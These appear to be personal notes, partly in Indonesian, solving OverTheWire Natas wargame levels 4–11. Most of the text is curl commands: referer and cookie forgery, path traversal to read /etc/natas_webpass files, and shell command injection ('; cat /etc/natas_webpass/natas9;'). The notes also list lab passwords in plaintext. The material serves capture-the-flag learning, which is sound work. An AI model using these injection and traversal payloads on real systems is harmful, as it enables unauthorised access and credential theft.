Some Natas Solving
banyak cara, salah satu yang saya pakai adalah curl
# curl --help all
# curl --user "username:password" "https://apalah.com"
natas4
curl --referer "http://natas5.natas.labs.overthewire.org/" --user "natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" "http://natas4.natas.labs.overthewire.org"
natas5
curl --user "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" --cookie "loggedin=1" "http://natas5.natas.labs.overthewire.org"
natas6
curl --user "natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" -X "POST" -d "submit=1&secret=FOEIUWGHFEEUHOFUOIU" "http://natas6.natas.labs.overthewire.org"
natas7
sintax GET PHP
curl --user "natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" "http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../etc/natas_webpass/natas8"
natas8
# "syahrul" -> ebase64 -> reverse -> hex
# "3d3d516343746d4d6d6c315669563362" <- string <- reverse <- dbase64
python2 :
import base64
base64.b64decode('3d3d516343746d4d6d6c315669563362'.decode('hex')[::-1])
lalu
curl --user "natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe" -X "POST" -d "submit=1&secret=oubWYf2kBq" "http://natas8.natas.labs.overthewire.org"
natas9
# command injection berupa check word in the file
# pass always store in /etc/natas_webpass/natas{} . known from natas7, but only for natas 1-10 :D
tes; cat /etc/natas_webpass/natas9;
natas10
# command injection, berupa check word in a file
grep -i u /etc/natas_webpass/natas10; # file1
grep -i u /etc/natas_webpass/natas10 file1
# -> mencari kata "syah" di file1 & file2
natas11
curl --user "natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK" "http://natas11.natas.labs.overthewire.org/index-source.html"